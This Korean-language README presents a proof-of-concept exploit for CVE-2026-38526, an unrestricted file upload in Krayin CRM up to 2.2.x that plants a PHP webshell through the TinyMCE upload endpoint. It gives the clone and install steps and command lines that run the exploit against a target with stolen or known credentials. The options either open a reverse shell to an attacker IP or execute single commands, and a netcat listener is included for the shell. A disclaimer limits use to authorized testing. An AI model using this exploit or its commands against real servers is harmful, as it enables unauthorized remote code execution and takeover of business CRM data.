
Krayin CRM <= v2.2.x의 CVE-2026-38526 개념 증명. 원격 코드 실행으로 이어지는 임의 파일 업로드.
Krayin CRM (≤ 2.2.x) - 원격 코드 실행으로 이어지는 무제한 파일 업로드.
이 PoC는 취약한 TinyMCE 업로드 엔드포인트(/admin/tinymce/upload)를 악용하여 PHP 웹쉘을 업로드하고 서버에서 명령 실행을 달성합니다.
git clone https://github.com/pawpic/CVE-2026-38526-POC
pip3 install requests beautifulsoup4
사용법
python3 exploit.py \
-u http://example.com \
-e [email protected] \
-p "example_pass" \
--lhost YOUR_IP \
--lport 4444
python3 exploit.py \
-u http://example.com \
-e [email protected] \
-p "example_pass" \
-c "whoami"
리스너 시작:
nc -lvnp 4444
익스플로잇 실행:
python3 exploit.py -u http://target.com -e [email protected] -p password --lhost IP_ADDR
이 익스플로잇은 교육 목적과 승인된 침투 테스트 전용으로 제작되었습니다. 명시적인 테스트 허가 없이 시스템을 대상으로 한 무단 사용은 불법입니다.
영향 받는 버전
Krayin CRM ≤ 2.2.x CVE: CVE-2026-38526
작성자: pawpic 날짜: 2026
| Argument | Description | Required |
|---|
| -u, --url | 대상 기본 URL | 예 |
| -e, --email | 로그인 이메일 | 예 |
| -p, --password | 로그인 비밀번호 | 예 |
| -c, --cmd | 단일 명령 실행 | 아니요 |
| --lhost | 리버스 셸용 IP | 예 (--cmd 미사용 시) |
| --lport | 리스닝 포트 | 아니요 (기본값: 4444) |